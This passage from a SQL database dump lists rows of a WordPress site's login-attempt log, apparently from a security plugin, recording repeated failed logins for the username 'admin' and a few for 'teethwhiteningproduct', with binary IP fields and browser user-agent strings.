Firefox/62.0'),(5999,8166,1629546085.766647,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6000,8167,1629546089.940927,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6001,8167,1629546090.104231,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6002,8168,1629546917.423773,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6003,8169,1629547679.585746,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6004,8170,1629547749.884744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���� �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6005,8171,1629548619.454983,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6006,8172,1629549227.080885,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(6007,8173,1629549484.146969,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6008,8174,1629550355.181091,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6009,8175,1629550765.295094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6&I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(6010,8176,1629551303.843279,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���m~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6011,8177,1629552214.902784,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6012,8178,1629552323.810852,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6013,8179,1629553169.471218,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6014,8180,1629553544.816514,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(6015,8181,1629553874.905712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��=��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(6016,8182,1629554112.932068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^+.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6017,8183,1629555067.461557,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h%��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6018,8184,1629556054.618050,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6019,8185,1629556785.769891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Rʬ�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(6020,8186,1629556996.035897,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6021,8187,1629557975.798001,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(6022,8188,1629557984.222990,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6023,8189,1629559018.921455,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6024,8190,1629559166.177109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(6025,8191,1629559313.050870,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),(6026,8192,1629560025.888974,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6027,8192,1629560026.020180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6028,8193,1629561552.930173,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6029,8194,1629562745.042914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���a�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6030,8195,1629569883.549274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����;I','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6031,8196,1629571173.949888,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(6032,8197,1629572247.295864,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6033,8198,1629572484.421738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�I�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6034,8199,1629572505.916327,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6035,8200,1629572721.404696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Yt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6036,8201,1629572960.708920,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6037,8202,1629573234.506119,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6038,8203,1629573471.376167,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gV�]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6039,8204,1629573731.811017,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��2��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6040,8205,1629573772.383346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(6041,8206,1629573961.999866,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6042,8207,1629574217.405313,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6043,8208,1629574483.667202,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6044,8209,1629574784.975492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6045,8210,1629575001.057303,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(6046,8210,1629575001.114003,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ν�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(6047,8211,1629575059.445065,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6048,8212,1629575357.888176,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6049,8212,1629575357.903468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6050,8213,1629575412.775168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6051,8214,1629575418.310317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6052,8215,1629575425.769795,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6053,8216,1629575432.125236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6054,8217,1629575437.428599,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6055,8218,1629575441.801735,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6056,8219,1629575445.832911,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6057,8220,1629575449.846843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6058,8221,1629575452.736569,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6059,8222,1629575458.543119,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6060,8223,1629575462.892637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6061,8223,1629575463.002433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6062,8224,1629575465.962481,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6063,8225,1629575469.776609,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6064,8226,1629575471.184183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6065,8227,1629575472.491079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6066,8228,1629575474.020814,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6067,8229,1629575476.369008,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6068,8230,1629575478.217160,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����|','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(6069,8232,1629575640.140323,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6070,8233,1629575920.799728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6071,8234,1629576189.395856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;I�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6072,8235,1629576474.401274,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6073,8236,1629576742.846203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6074,8236,1629576742.900087,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6075,8237,1629577059.396782,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6076,8239,1629577373.859498,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��zrL�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6077,8240,1629577638.630718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6078,8241,1629577947.113502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6079,8242,1629578253.809781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��1�m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6080,8243,1629578568.021987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:�L','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6081,8244,1629578900.628656,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6082,8245,1629579209.967617,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6083,8247,1629579515.111127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6084,8248,1629579842.333277,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�\"o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6085,8249,1629580150.230365,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6086,8250,1629580457.192255,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6087,8251,1629580776.560513,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6088,8252,1629581086.842220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6089,8253,1629581437.263488,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6090,8254,1629581709.328644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6091,8255,1629582051.545380,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6092,8256,1629582176.100764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(6093,8257,1629582387.394390,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6094,8258,1629582705.175727,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6095,8259,1629583034.764046,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6096,8260,1629583364.237020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��BF��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6097,8261,1629583371.346409,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(6098,8262,1629583681.470322,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��1�m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6099,8263,1629584057.944190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��`>w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6100,8264,1629584332.157822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6101,8265,1629584564.024014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kȷ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(6102,8266,1629584680.128629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ғ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6103,8267,1629585014.746115,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6104,8268,1629585353.620096,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\̆�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6105,8269,1629585679.062240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6106,8270,1629585759.731214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6107,8271,1629586046.495864,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6108,8272,1629586413.400935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6109,8273,1629586954.248812,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(6110,8274,1629587102.275199,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6111,8275,1629587441.320637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6112,8276,1629587811.719506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6113,8277,1629588153.482709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(6114,8278,1629588168.211483,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6115,8279,1629588512.081193,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6116,8280,1629588861.155315,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6117,8281,1629589193.360745,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0g3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6118,8282,1629589578.725537,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6119,8283,1629589956.736173,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6120,8284,1629590332.600210,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/d�?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6121,8285,1629590681.405096,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6122,8286,1629591025.474305,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6123,8287,1629592078.929355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 